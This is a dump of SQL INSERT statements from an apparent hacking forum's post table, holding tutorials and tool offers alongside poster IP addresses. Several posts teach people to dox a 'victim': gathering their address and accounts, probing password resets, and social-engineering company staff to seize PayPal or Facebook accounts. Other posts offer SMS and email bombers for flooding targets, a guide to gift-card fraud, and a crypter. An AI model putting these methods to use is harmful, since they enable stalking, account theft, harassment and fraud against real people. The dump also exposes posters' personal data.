(It\'s a great program that fetches the victims address, name and phone number. It doesn\'t work sometimes)\n\nIf you don\'t get any information, then you will get /canada and a country. The country is right but the \"/canada\" is wrong.\n[/color]\n\nNOTE IT DOWN.\n\n[color=#FFD700]Now go on pipl.com and search using the email address. Now not all the results will be of the victims so be careful but have the results open and view each link and check.[/color]\n\n[color=#32CD32]Then using the email, search on YouTube.com, Facebook.com and startpage.com(Google).[/color] \n\n[color=#FF1493]Note down the results and you can use Google but startpage is safer and provides the safe exact results Google would provide because it\'s made by Google. Just paste the email address and search, then again on google/startpage search again but this time with any username you found from pipl.com. When you search on Google, look through all the results you will find the things you can\'t imagine the victim has left behind. Ex: MSN ID, Skype ID, Alternative Emails, Online banking account IDs also what kinds of communities they join. You can even add them and chat with them and get more info. Now if they join a gaming community so it\'s obvious that they like gaming. [/color]\n\n[color=#9400D3]Now type in the email address appending Myspace on Google. Ex: [b]alien@hotmail.com[/b] Myspace (This will get you his Myspace on which the victim must have surely left either his hobbies or picture). [/color]\n\n[color=#A9A9A9]Then go on whitepages and search them on whitepages.com to confirm their address or name. [/color]\n\n[u]Now that\'s pretty much it. Now if you have to go deep/more blackhat then read below.[/u]\n\n[color=#800000]Now try the password reset on all their emails. I mean look at the options and confirm the details you have also you find out what location they really are in because if they have a mobile pwd reset option then it will show the country code which will prove their location.[/color]\n\n[color=#FFFFFF]So now whatever the case be, if they are part of huge websites such as PayPal, Facebook etc you can SE the reps using the information you have and get access to their accounts. [/color]\n\n[color=#1E90FF]To get their IP, you can find a good IP grabber from Google.\n[/color]\n\n[b]Download Link for Roxer Doxer[/b] \n\n[quote]\nhttp://www.mediafire.com/?1nd2ixs3fkq8asn\n[/quote]\n\nHope you liked my tutorial. Enjoy!', '41.174.7.183', '699271095', '1', '0', '1', '1343951235', '1', 'd727bc1e13b9da3fa9717cbe11a9c878', '0', '1343951235'); INSERT INTO mybb_posts VALUES('155', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '1', 't3h jok3r', '1343951289', 'Thanks I SE\'d my first kindle today. It wasn\'t that hard after all and nice layout.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', 'dfce7ccca024c80bc72958e4cf1fd34b', '0', '0'); INSERT INTO mybb_posts VALUES('133', '51', '0', '11', 'DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1342395331', 'Google tracks all your searches even without your permission as well as your IP address. I recommend using [url=https://startpage.com/]Startpage[/url] which is enhanced by Google so it will provide the exact same results Google would provide but on Startpage it doesn\'t track your IP and you can view the website you get from the result with a proxy provided on each link on Startpage. \r\n\r\nEnjoy!', '41.174.7.183', '699271095', '1', '0', '0', '0', '1', '34f29b70965c5ebd93f2dafb23ed68ba', '0', '0'); INSERT INTO mybb_posts VALUES('134', '52', '0', '9', '?? Adsense Secrets - What Google Never Told ?? [New Release] [Huge Profits]', '0', '4', 'Triple H', '1342395879', '[align=center][img]http://i.imgur.com/DVKYN.png[/img][/align]\r\n\r\n[color=#00BFFF]In AdSense Secrets 5 You Will Discover....[/color]\r\n\r\n[color=#FFFFFF]? How to Claim Your Share of The Multi-Billion Dollar AdSense Pie\r\n? Ways to Build An Adsense Ready Website Without a Domain or Hosting\r\n? Secrets to Tweaking and Optimizing your Ads for Maximum Revenue\r\n? How to use Google\'s Custom Search engine to Catch Fickle Visitors\r\n? Special Code to Influence Your Ads with Section Targeting and Keywords[/color]\r\n\r\n[align=center][img]http://i.imgur.com/QR0Qf.png[/img][/align]\r\n\r\n\r\n[color=#FFFFFF]? How to Understand your AdSense Stats, Channels and Split Testing\r\n? That you can use Google Analytics to Optimize your AdSense Revenue\r\n? Smart Pricing and What it Means for your Income\r\n? Whether AdSense for RSS Feeds and Mobile are right for You\r\n? How to Generate Quality Long Term Traffic for Consistent AdSense Profits\r\n? Which Social Media Sites You Can Leverage Into AdSense Traffic\r\n? The Biggest Mistakes AdSense Publishers make and how to AVOID them.\r\n? What TO DO if your AdSense Account gets closed\r\n? What TO DO if you\'re not getting the results you want.\r\n? What TO DO BEFORE you apply to Google\r\n? The Wordpress Theme That Makes AdSense Optimization Easy[/color]\r\n\r\n\r\n[quote]\r\nSales Page: http://www.adsense-secrets.com\r\n[/quote]\r\n\r\n[color=#32CD32]Download:[/color]\r\n\r\n[quote]\r\nhttp://9670ba69.linkbucks.com\r\n[/quote]', '41.174.7.183', '699271095', '1', '0', '0', '0', '1', 'f7c1052a3d4cf19c4ff8dc974bb3cca5', '0', '0'); INSERT INTO mybb_posts VALUES('135', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '1', 't3h jok3r', '1342397669', 'Great tutorial. I wonder how I missed this tutorial out.', '41.174.7.77', '699270989', '1', '0', '1', '1342472725', '1', '88f149dde38461c6e7f013e846f15781', '0', '1342472725'); INSERT INTO mybb_posts VALUES('136', '53', '0', '19', '[Junk]Adding Beauty by Painting', '0', '18', 'MartyFogerlie', '1342429044', 'With the growing demand for houses and apartments in Kerala, builders are taking a lot of care to provide the best service to the customers. Interior designing and painting has gained a lot of importance. The [url=http://www.jairajbuilders.com/]apartments in Kerala[/url] have entered a new era.\r\n \r\nThere are different types of paints and finishes. Each has its own advantages and disadvantages. Latex paint is easier to clean up but it is not suitable in humid rooms like bathrooms.  The other advantages of latex paints are that they are usually cheaper, fade resistant, easier clean up, environment friendly, dries fast, no special thinners or solvents required, less dust pick up and requires less stirring less often. It is generally preferred for walls, ceilings and primed woodwork. Oil based paints are stain resistant and adhere well to the walls even in humid regions. Their other advantages include better flow properties, allow for a smoother finish, slower set up time. But it is difficult to remove it from the brushes, floor or the skin and requires turpentine. It is preferred for wood trim, cabinets and metal surfaces. The different types of finish determine how light gets reflected off the walls and how easier it is to remove stains and scuff marks after the walls are painted.\r\n \r\nDifferent ways of lighting the apartment can affect the way the paint looks. The paint may look very beautiful under the fluorescent light but might not be so attractive in the natural light. Bold shades and unusual colors can transform completely the way an apartment looks.', '115.249.239.138', '1945759626', '0', '0', '0', '0', '1', '0849a2672de187558a133d3c3beb1748', '0', '0'); INSERT INTO mybb_posts VALUES('137', '53', '136', '19', '[Junk]Adding Beauty by Painting', '0', '1', 't3h jok3r', '1342468645', 'This thread has been junked.', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('138', '54', '0', '16', '[tut]How to SE McDonald', '0', '9', 'p420', '1342469413', 'You can either call them up(for the more pro SE\'er)\r\n\r\nOR\r\n\r\nYou can go to http://www.mcdonalds.com (for the more beginner SE)\r\n\r\nIn this guide we are going to go with the beginner SE so we are going to go to the website\r\n\r\n1: Go to http://www.mcdonalds.com and find the Contact Us page at the bottom on the page.\r\n\r\n2: Come up with a really good story on how shitty your food looked or tasted...(remember the more you say you spent the higher your free Gift card will be, it does vary)\r\n\r\n3: Wait about 2 days for them to contact you back\r\n\r\n4: They will send you a message saying they are truely sorry for your unsatisfactorial visit with there mcdonalds and that they are immediatly doing what they can to help you..\r\n\r\n5: That\'s it your done wait till you get your gift card in the mail for free food.\r\n\r\nNo need to use fake info... and its as easy as that', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', 'c8d802eeb7deb867b7b2f3ab9f672533', '0', '0'); INSERT INTO mybb_posts VALUES('139', '55', '0', '12', '[tut] SMS Bomber', '0', '9', 'p420', '1342469677', 'Here is a SMS Bomber that is very simple and easy to use, it is also for Android phones [color=#FFD700][u]ONLY[/u][/color]. But do not be confused it can send to any type of phone :) \r\nIt is possible to overload your targets phone and crash it with too many messages. ;)\r\n\r\n[u][color=#FFD700]Features[/color][/u]\r\n- Unlimit number of text\r\n- Flood multiple contacts\r\n- Cancel button\r\n- No delay or periodically send\r\n- Remember last config\r\n- Easily select contacts\r\n- Counter to make sms differently\r\n- Add counter to (press menu/Counter) into each text \r\n\r\n[color=#FF0000]Step 1:[/color]\r\nGet on your Android phone and go to your browser and type this in the URL.\r\nhttp://code.google.com/p/sms-bomber/downloads/list\r\n\r\n[color=#FF0000]Step 2:[/color]\r\nClick on the first box with the [color=#32CD32]green[/color] download arrow. You can download any version but I suggest choosing the first one, it is the most updated. \r\n\r\n[color=#FF0000]Step 3:[/color] \r\nOnce done downloading just run the program and enter the targets info and your message. \r\n\r\n[size=large][b]Here is the VS. It is not harmful to you so do not worry.[/b][/size]\r\n[i]File Info[/i]\r\n\r\nReport date: 2012-07-10 06:48:58 (GMT 1)\r\nFile name: [b]smsbomber-v1-1-apk[/b]\r\nFile size: 140344 bytes\r\nMD5 Hash: cc747206f53615f95f7a35ad0d898972\r\nSHA1 Hash: 18258461db5c78232420a7e038dba3c9cbe0cd15\r\nDetection rate: [color=#FF0000]3[/color] on 14 ([color=#FF0000]21%)[/color] \r\nStatus: INFECTED \r\n\r\nDetections\r\n\r\nAsquared - [color=#FF0000]AndroidOS.HackTool.SMSBomber!IK[/color]\r\nAvast - \r\nAVG - \r\nAvira - \r\nBitDefender - \r\nClamAV - \r\nComodo - \r\nDrWeb - \r\nFprot - \r\nIkarusT3 - [color=#FF0000]AndroidOS.HackTool.SMSBomber[/color]\r\nPanda - \r\nSTOPZilla - \r\nTrendMicro - [color=#FF0000]AndroidOS_SMSBOMBER.CDE[/color]\r\nVBA32 - \r\n\r\n[i]Scan report generated by[/i]\r\nNoVirusThanks.org\r\n\r\nThat\'s it! Very simple to use and very straight forward! \r\nCheers.', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', '0b3793ab3b97162788a0745ece3a804b', '0', '0'); INSERT INTO mybb_posts VALUES('140', '56', '0', '15', 'Tubeonia [ Best Youtube Bot ]', '0', '5', 'Timmy', '1342470071', '[align=center]Tubenoia is the cheapest, most advanced and most complete YouTube marketing software on the web.\r\n\r\nEasy\r\nGetting started is not only simple, effortless and stress-free, it’s also very straightforward. Our application can be geared up in a matter of seconds, working its magic with a click of a button. After installation, which is complete in a few simple steps, you’re ready to go.\r\n\r\nFast\r\nThe best part about using our application is the speed in which the results come flooding in. In just a matter of days, your channel can receive a much higher volume of visitors, subscribers and comments than you could ever achieve alone.\r\n\r\nEffective\r\nThe success of our application is thanks to the many features it brings to your YouTube channel, whether you are a director, producer, actor, comedian, marketer or simply promoting your organisation, product or service. To make an impact, you should choose an application which brings results, not just once, but continuously, to enable your channel to grow.\r\n\r\nHere is some of the variety of features Tubenoia offers. We have picked our most favorited features.\r\n\r\n- Rank Checker\r\n- Video Scrapers\r\n- From top lists\r\n- From keywords\r\n- From channels\r\n- “About to go viral”\r\n- Fully customizable settings\r\n- Multithreaded\r\n- Account Checker\r\n- User Scrapers\r\n- From comments\r\n- From friends\r\n- From subscribers\r\n- From any page\r\n- Filters\r\n- User filters\r\n- Filter by: friend count, subscriber count, video upload count\r\n- Video filters\r\n- Filter by: views, favorites, ratings and comments\r\n- Mass Downloader\r\n- 240, 360, 480, 720 and 1080 support\r\n- Tools\r\n- Comment Obfuscator\r\n- Video Tools\r\n- Give likes, dislikes, favorites, friend requests, subscriptions, etc.\r\n- Comment Rater\r\n- Proxy Scraper\r\n- Account & Proxy Binder\r\n- Avatar Uploader\r\n\r\n[b]Virus scan[/b]\r\nhttp://www.virustotal.com/file-scan/report.html?id=3d8b89eb8481a6ad68455796b0d4f9af34e18a238533c341c74e8f2e1055b31e-1319755185\r\n\r\n[b]Download[/b]\r\nhttp://www.multiupload.com/5120SXTAMH[/align]', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', '35967c340a338b80a3127765b7703478', '0', '0'); INSERT INTO mybb_posts VALUES('141', '57', '0', '18', 'Hackyer\'s Email Bomber V1.0', '0', '12', 'jonas83', '1342471305', 'This is the first program i have made so dont take this piss lol\r\nIts easy to use so im not going to do a tutorial, i have tested it and it works fine enjoy.\r\n[align=center]\r\n\r\n[img]http://img401.imageshack.us/img401/1812/bomberb.png[/img]\r\n\r\n[i]File Info[/i]\r\n\r\nReport date: 2010-09-16 13:40:41 (GMT 1)\r\nFile name: [b]hackyer-s-email-bomber-exe[/b]\r\nFile size: 612864 bytes\r\nMD5 Hash: a0b920dc9229d16a8614ac8d4e20f064\r\nSHA1 Hash: 84290df51b839e356addbd66ab9dd9b851242232\r\nDetection rate: [color=#32CD32]0[/color] on 16 ([color=#32CD32]0%[/color]) \r\nStatus: [color=#32CD32]CLEAN [/color]\r\n\r\nDetections\r\n\r\n\r\na-squared - \r\nAvast - \r\nAVG - \r\nAvira AntiVir - \r\nBitDefender - \r\nClamAV - \r\nComodo - \r\nDr.Web - \r\nF-PROT6 - \r\nIkarus T3 - \r\nKaspersky - \r\nNOD32 - \r\nPanda - \r\nTrendMicro - \r\nVBA32 - \r\nVirusBuster - \r\n\r\nScan report generated by\r\nNoVirusThanks.org[/align]\r\n\r\nDOWNLOAD:\r\n\r\n[quote]\r\nhttp://www.multiupload.com/RS_VORRKHE43B\r\n[/quote]', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', '127051ddfb39bc3ae0f1d9265b0c1599', '0', '0'); INSERT INTO mybb_posts VALUES('142', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '4', 'Triple H', '1342471521', 'Thanks for replacing the link. Works perfectly.', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', 'fd0407cbd3f5ce8edbcf390ccf912c99', '0', '0'); INSERT INTO mybb_posts VALUES('143', '28', '82', '3', 'RE: Buttons updated.', '0', '1', 't3h jok3r', '1343926039', 'New CSS buttons coming into play today.', '173.245.64.174', '-1376436050', '1', '0', '0', '0', '1', 'e26be029f62d7bd28067729616d9c753', '0', '0'); INSERT INTO mybb_posts VALUES('144', '58', '0', '42', 'Miley Cyrus gets swatted', '0', '1', 't3h jok3r', '1343945931', 'Miley Cyrus\' Los Angeles home was swarmed by police, fire and rescue squads responding to a report of a possible home invasion, but the pop star was apparently the victim of a \"swatting\" prank.\r\nLaw enforcement officials said a 911 call came in Wednesday at 6:50 p.m. PT, stating a possible home invasion with possible shots fired at Cyrus\' home.\r\n\"We responded to a call of a kidnapping in progress, one person shot, at an address on Amanda Drive,\" North Hollywood police said. \r\n\r\nLol read more: http://gma.yahoo.com/miley-cyrus-california-home-swarmed-police-possible-hoax-112155400--abc-news-celebrities.html', '41.174.16.25', '699273241', '1', '0', '0', '0', '1', 'd009739d014bfafd9af92140fe1127d8', '0', '0'); INSERT INTO mybb_posts VALUES('145', '59', '0', '42', '13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1343946002', 'http://www.youtube.com/watch?v=nHKDeBBbd-U&feature=related\r\n\r\nPoor kid goes to jail for blackhat hacking.', '41.174.16.25', '699273241', '1', '0', '0', '0', '1', '2bbb608081b4ec84f483ee8678efbec3', '0', '0'); INSERT INTO mybb_posts VALUES('146', '60', '0', '25', '[guide] Basic Computer Security', '0', '1', 't3h jok3r', '1343946768', 'This guide was written to provide a foundation of security on your system. It will not guarantee you 100% safety, but it will reduce the risks of infection greatly. I will update this guide as I find more relevant information.\n\n[color=green][u][b]Table of Contents:[/b][/u][/color]\n[list][*]1. Basics to being secure on the web\n[*]2. Antivirus\n[*]3. Antispyware\n[*]4. Firewall\n[*]5. Prevention\n[*]6. List of Security Software\n[*]7. External Links & Information\n[/list]\n\n[color=green][u]1. [b]Basics to being secure on the web[/b][/u][/color]\n\nFirst of all, no security in the world can keep you completely safe from every single unique malware created. The number one way to stay safe is having [b]safe surfing habits[/b]. Remember, preventing a virus from ever winding its way onto your PC in the first place is the best way to keep safe.\n\nSafe surfing habits means you don\'t just Google something and click on the first result that comes up. It would be good to get in a habit of checking websites you browse to. You can easily do that with a quick Google search of \" [website URL] good or bad?\". The way I do it is checking on McAfee\'s Siteadvisor website: [url=http://www.siteadvisor.com]Siteadvisor[/url]. Do a quick search on there, read some of the reviews, and make your decision on if you should go onto that website or not.\n\n\n[color=green][u]2. [b]Antivirus[/b][/u][/color]\n**Note: Do NOT install and run more than one antivirus per PC. Having more than one antivirus does not secure your PC any more than having one does. All it causes are conflicts on your PC.\n\nThere are plenty of good antiviruses out there. Though this is biased in my opinion, I have researched a bit on several vendors and come to a few conclusions. I have seperated the comparison into two categories: freeware and paid software. Do note, paid software isn\'t necessarily better than freeware.\n\n[list][*]Starting off with commercial products, I believe the top two competitors would be [b]Kaspersky Internet Security[/b] and [b]ESET Smart Security[/b]. I personally have only used Kaspersky, ESET, McAfee, and Symantec commercial products. \n\n[list][*][b]Kaspersky[/b] has been noted for its high detection capabilities, and it is not a memory hogger. It comes with several features, including an antivirus and antispyware engine, a firewall, spam filter, parental controls, and a few other tools.\n\n[u]February 2009 AV Comparatives Results[/u]\nAward received: Advanced +\nNumber of False Positives: Few\nOn demand Scanning Speed: Average\nTotal Percentage (Detection Rate): 97.1%\n\nScreenshot:\n[spoiler][img]http://www.sizlopedia.com/wp-content/uploads/kaspersky2009.jpg[/img][/spoiler]\n\n\n[*][b]ESET[/b] is also known for high detection rates. In addition, it is recorded as the most lightweight antivirus in its market. ESET has a sleek interface and includes features such as an antivirus and antispyware engine, a firewall, a spam filter, and a few other tools.\n\n[u]February 2009 AV Comparatives Results[/u]\nAward received: Advanced +\nNumber of False Positives: Few\nOn demand Scanning Speed: Average\nTotal Percentage (Detection Rate): 97.6%\n\nScreenshot:\n[spoiler][img]http://www.eset.eu/buxus/images/essv4gui.jpg[/img][/list][/spoiler]\n\n\n\n[*]Next are the freeware programs. I personally have only tried AVG, avast! and Avira Antivir. I recommend either [b]Avira Antivir[/b] or [b]avast! Antivirus[/b]. \n\n[list][*][b]Avira Antivir[/b] is rated number one in detection rates for 2008/2009. Based on tests by AVcomparative, Avira detected over 99% of the threats that were set on the system. The only thing I can criticize is Avira\'s updating system is a bit on the slow side. Features of Avira (free version) include an antivirus and antispyware engine, with a couple of other features.\n\n[u]February 2009 AV Comparatives Results[/u]\nAward received: Advanced\nNumber of False Positives: Many\nOn demand Scanning Speed: Average\nTotal Percentage (Detection Rate): 99.7%\n\n*Note: The reason Avira Antivir did not receive Advanced + is because of the high number of false positives.\n\nDownload link for the Avira Antivir Personal Edition: [url=http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2239_4-10322935&ontId=2239_4&spi=e6e462f80757049a31116cdaf2c22284&lop=link<ype=dl_dlnow&pid=11024276&mfgId=6290072&merId=6290072&pguid=z3fN7AoPjAMAAEFs3kwAAAF7&destUrl=http%3A%2F%2Fdownload.cnet.com%2F3001-2239_4-10322935.html%3Fspi%3De6e462f80757049a31116cdaf2c22284%26part%3Ddl-10322935]Download Avira[/url]\n\nScreenshot:\n[spoiler][img]http://www.hwdot.com/images/Avira%20AntiVir%20PersonalEdition%20Classic%20-%20Free%20Antivirus%20Freeware%202.jpg[/img][/spoiler]\n\n\n[*][b]avast! Antivirus[/b] is a free antivirus that comes with an antivirus, antispyware, and anti-rootkit engine, along with online protection. It too has a high detection rate.\n\n[u]February 2009 AV Comparatives Results[/u]\nAward received: Advanced\nNumber of False Positives: Many\nOn demand Scanning Speed: Fast\nTotal Percentage (Detection Rate): 98.2%\n\nDownload link: [url=http://www.avast.com/eng/avast_4_home.html]avast! Antivirus Home Edition[/url]\n\nScreenshot:\n[spoiler][img]http://i.d.com.com/i/dl/media/dlimage/55/88/1/55881_large.jpeg[/img][/spoiler]\n[/list][/list]\n\n[color=green][u]3. [b]Antispyware[/b][/u][/color]\nIf you are using a commercial antivirus product, chances are you already have an antispyware engine bundled with it so skip this section.\n\nHowever, if you are using a free antivirus, here is a list of a few antispyware programs you may be interested in.\n\n[list][*][b]Malwarebytes\' Antimalware[/b]\nA new antispyware program, this small program is recommended for several reasons. One, it has great detection rates. Two, it uses minimal system resources. Three, fast updates, quick scans; it also produces a log after each scan. Malwarebytes\' Antimalware comes with an extra tool, FileAssassin. This is used to securely delete locked files, or persistent malware files.\n\nDownload link: [url=http://malwarebytes.org/]Malwarebytes\' Antimalware[/url]\n\nScreenshot:\n[spoiler][img]http://www.zen22142.zen.co.uk/Media/malwarebytes.gif[/img][/spoiler]\n\n[*][b]Ad-Aware[/b]\nThough Ad-Aware isn\'t as recommended by security experts anymore, it is still good to have as a backup scanner.\n\nDownload link: [url=http://www.lavasoft.com/products/ad_aware_free.php]Ad-Aware Free[/url]\n\n\n[*][i]AVG Antispyware was removed from this list due to the recent decision to not have AVG Antispyware as a stand alone product. It is now included in the AVG Internet Security Suite[/i]\n[/list]\n\n[color=green][u]4. [b]Firewall[/b][/u][/color]\n**Note: Just like an antivirus, do not run more than one firewall per PC. It causes conflicts on your PC.\n\nAgain, if you are using a commercial security suite, a firewall should already be included. Firewalls are vital to a computer\'s security. They help monitor incoming and outcoming connections, etc. There are many free firewalls out there, and the few that I recommend are [b]ZoneAlarm[/b] and [b]Comodo Firewall[/b]. \n\n[list][*][b]ZoneAlarm[/b] is for a less computer savvy user. It has the basic features of a firewall, with antivirus monitoring included. \n\nDownload link: [url=http://www.zonealarm.com/security/en-us/zonealarm-pc-security-free-firewall.htm]ZoneAlarm Free[/url]\n\nScreenshot:\n[spoiler][img]http://www.webtechgeek.com/NewYorkPics/ZoneAlarm-Free.jpg[/img][/spoiler]\n\n[*][b]Comodo Firewall[/b] comes with an antivirus engine. It is a bit more advanced than ZoneAlarm. It also has basic firewall features, along with the bonus feature of an antivirus. I wouldn\'t rely solely on Comodo\'s antivirus though; you should still have an independent antivirus.\n\nDownload link: [url=http://personalfirewall.comodo.com/download_firewall.html]Comodo Firewall[/url]\n\nScreenshot:\n[spoiler][img]http://pcwin.com/media/images/screen/73890-comodo_firewall_pro.gif[/img][/spoiler]\n\n[*][b]Online Armor[/b] is a well recognized firewall. It is also considered a HIPS program, and is very useful in detecting malware.\n\nDownload link: [url=www.tallemu.com]Online Armor[/url]\n\nScreenshot:\n[spoiler][img]http://www.softpedia.com/screenshots/Online-Armor-Personal-Firewall-AV-plus_3.png[/img][/spoiler]\n[/list]\n\n[color=green][u]5. [b]Prevention[/b][/u][/color]\n\nThis may be one of the most important parts in this whole guide. Prevention is the key. A couple of things I recommend to finalize your computer\'s security:\n\n[list][*][b]MVPS Hosts file[/b]\n\nA HOSTS file is basically a file that blocks websites. For this reason, it is very useful. MVPS Hosts can be used to block malicious websites. This means when you go on one of the malicious websites, your browser should show a \"Page load error\" instead of loading the page.\n\nInstructions and download link is here: [url=www.mvps.org/winhelp2002/hosts.htm]MVPS Hosts[/url]\n\n[*][b]SpywareBlaster[/b]\n\nSpywareBlaster is a program that creates a list of restricted sites, and it blocks cookies in Mozilla FireFox and Internet Explorer.\n\nDownload link and more information here: [url=http://www.javacoolsoftware.com/sbdownload_setup.html]SpywareBlaster[/url]\n\n[*][b]WinPatrol[/b]\n\nWinPatrol is a handy tool that monitors any unwanted changes to your system, including changes in startup programs, HOSTS file, etc.\n\nDownload link and information: [url=http://www.winpatrol.com/]WinPatrol[/url]\n[/list]\n\nThese last couple of programs can be useful too, but I won\'t go into details about them:\n\nSandBoxie - a sandbox for running programs in\nCCleaner - clearing out temp files, etc\n\n\n[color=green][u]6. [b]List of Security Software[/b][/u][/color]\nThis may be incomplete, so please reply or give me a PM if there is something to be added. This is meant as a reference list if ever needed.\n\n[b]Antivirus Security Vendors:[/b]\n[list][*]McAfee (McAfee products)\n[*]Kaspersky (Kaspersky products)\n[*]Alwil (avast! products)\n[*]Symantec (Norton products)\n[*]Sophos (Sophos products)\n[*]ESET (NOD32 and ESET Smart Security products)\n[*]AVG (AVG products ; AVG Antispyware was bought by AVG, originally named Ewido)\n[*]BitDefender (BitDefender products)\n[*]Panda (Panda products + new Cloud Antivirus)\n[*]F-Secure (F-Secure products + Conflicker worm removal tool)\n[*]Kingsoft (Kingsoft products)\n[*]Microsoft (Microsoft Live OneCare ; to be discontinued soon)\n[*]Norman\n[*]PC Tools \n[*]Rising\n[*]ZoneAlarm (ZoneAlarm products; specialty is in firewalls)[/list]\n\n[b]Antispyware Vendors:[/b]\n[list][*]Webroot (SpySweeper)\n[*]Lavasoft (Ad-Aware)\n[*]Sunbelt (Counterspy)\n[*]Prevx (Prevx CSI)\n[*]Microsoft (Windows Defender)[/list]\n\n[b]Firewall:[/b]\n[list][*]ZoneAlarm\n[*]Comodo\n[*]Sunbelt (Kerio Firewall)\n[*]Agnitum (Outpost Firewall)\n[*]Tiny (Tiny Firewall)\n[*]Online Armor [/list]\n\n[b]HIPS (Host Intrusion Prevention System):[/b]\n[list][*]PC Tools (ThreatFire)\n[*]Crawler (Spyware Terminator)\n[*]DefenseWall[/list]\n\n[b]Anti-Trojan:[/b]\n[list][*]Trojan Hunter\n[*]a-squared[/list]\n\n[b]Anti-Keylogger\"[/b]\n[list][*]KeyScrambler[/list]\n\n[b]Rootkit Removers:[/b]\n[list][*]IceSword\n[*]F-Secure BlackLight\n[*]GMER\n[*]AVG Anti-Rootkit[/list]\n\n[color=green][u]7. [b]External Links & Information[/b][/u][/color]\n\n[url=http://www.spywarewarrior.com/rogue_anti-spyware.htm]SWW Rogue Antimalware Link[/url]\n[url=http://temerc.blogspot.com/]Malware Advisor[/url]\n[url=http://www.siteadvisor.com]SiteAdvisor (for checking websites)[/url]', '41.174.16.25', '699273241', '1', '0', '1', '1343947060', '1', '0550697ef4832e023b2c7afa45aaa5d2', '0', '1343947060'); INSERT INTO mybb_posts VALUES('147', '61', '0', '23', '[Tutorial] Prevention of Infection', '0', '8', 'spacefish36', '1343947441', '[align=center][size=medium][b][color=#00BFFF]Section 1[/color][/b][/size][/align]\r\n\r\nWelcome to White Hat Helper’s tutorial on prevention of infection. Within this tutorial, you will learn about various strategies often implemented to prevent harmful software from damaging your system. I’ll cover the following points: Importance of Infection Prevention, Potential Infectious Software Recognition, Infectious Software Treatment, Prevention of Infection Tools, and Prevention of Infection General Information.\r\n\r\n[b][u]Table of Contents[/b][/u]\r\n\r\n1.0 Introduction to Infection Prevention\r\n2.0 Importance of Infection Prevention\r\n3.0 Potential Infectious Software Recognition\r\n4.0 Preventing Infection\r\n 4.1 Online Anonymity\r\n5.0 Infectious Software Treatment\r\n 5.1 Antivirus Quarantine\r\n 5.2 HiJackThis\r\n6.0 Prevention of Infection Tools\r\n 6.1 HiJackThis\r\n 6.2 Application Isolation Software\r\n 6.2.1 Sandboxie\r\n 6.3 VPN Software\r\n 6.3.1 Hotspot Shield\r\n 6.3.2 Tor\r\n 6.3.3 Loki\r\n 6.4 Online Proxies\r\n 6.4.1 HideMyAss\r\n 6.5 Antiviruses\r\n 6.5.1 ESET NOD32\r\n 6.5.2 AVG\r\n 6.5.3 Avast\r\n 6.5.4 BitDefender\r\n 6.5.5 Kaspersky\r\n 6.6 Firewalls\r\n 6.6.1 Microsoft Windows Firewall\r\n7.0 Conclusion\r\n\r\nLearning how to prevent your system from being infected is one of the most important characteristics of a successful hacker. Whether you’re a White Hat Hacker or a Black Hat Hacker, being able to lock out malicious programs is absolutely vital to ensure that the life and efficiency of your setup is always at its peak. Being malware free and alert of potential tribulations is essential to any hacker’s computing competence.\r\n\r\n[u]2.0 Importance of Infection Prevention[/u]\r\n\r\nTo any serious hacker, the efficiency of their computer is one of the most important things. Having a slow, ineffective machine that’s jam-packed with viruses and spyware can be extremely frustrating and terribly inefficient. You want a machine that can be trusted; something that will rarely (if ever) crash. Infection prevention is the art of optimising your system with the best software possible to protect you from malicious programs. It’s also the art of adapting yourself to being alert of suspicious software and threats which may, in tern, cause your system to function poorly.\r\n\r\n[u]3.0 Potential Infectious Software Recognition[/u]\r\n\r\nHaving the ability to recognise software that might be potentially malicious is a key part in maintaining your system and keeping it virus free. There are a few different things that you should be on the lookout for when downloading [i]any[/i] software. Before downloading software, it’s important to stop and analyse it. There are a few things that should be taken into perspective: the source (website/torrent/colleague), its creator (the developer), and the feedback (reviews/write-ups/comments).\r\n\r\n[i]The Source[/i]\r\n\r\nWhen downloading anything, whether it is something as minor as a new font for your Photoshop arsenal, or something as major as a web browser or game, taking note of the download location is vital. If you download something that’s from a torrent or a poorly constructed website, you’re at a far greater risk of getting infected with malicious software disguised as a legitimate application. Torrents are one of the biggest highways for malware distribution, and it’s highly advisable to avoid them at all costs. Should you download a program from an official website which is well-known (example: Microsoft.com), you have virtually, a zero percent chance of being infected. This is probably considered as commonsense, but some programs can be difficult to deduce whether or not their source is, in fact, legitimate. This is where you have to look at other factors such as the creator and the feedback.\r\n\r\n[i]The Creator[/i]\r\n\r\nThe creator of an application or document is often one of the most important elements used to decide whether a download is safe or not. If you’re contemplating downloading something from a torrent and have very little information on the creator, it’s advised not to download the file. Likewise, if you’re downloading something from a poorly constructed website, with few regular viewers, it’s also advisable to avoid such downloads. Knowing the creator of the program is a trusted developer, it makes your decision a whole lot easier. For example, downloading a program from a Hack Forums user with over thirty + Reputation generally means the file will be clean. Once again, this is common knowledge, but it’s important to note that members with one or two posts and zero + Reputation would be considered as a bad source. It’s highly advisable to not download from members who don’t have a good reputation. A hacking forum is a prime target for script kiddies who want to infect people with their software. When situations get more difficult, and lie borderline between potentially dangerous and clean, you’ve got to assume they’re dangerous. This is where you should look at other information such as the feedback the creator’s received.\r\n\r\n[i]The Feedback[/i]\r\n\r\nFeedback can be information such as comments, ratings, and reputations. If a torrent has good comments, and a quality rating, then it can often be trusted as a legitimate download. Similarly, as mentioned above, a Hack Forums member with over ten + Reputation is far more likely to be trustworthy, rather than a new member with one post.\r\n\r\nWhen these three elements are analysed and you’ve corroborated correctly, you’ll normally have a good ideas as to whether it’s a trustworthy program or not. If you’re still unsure about a program’s authenticity, I’d advise you not to download it.\r\n\r\n[u]4.0 Preventing Infection[/u]\r\n\r\nPreventing infection is critical for the maintenance of your machine. Not only that, but it makes your overall computing experience much more gratifying. One of the most efficient ways to remain infection free, is to stay as anonymous as possible when online.\r\n\r\n[u]4.1 Online Anonymity[/u] \r\n\r\nOnline anonymity is that act of being unknown to third-party users when surfing the Internet. Whether it be social networking services, forums, or signups, 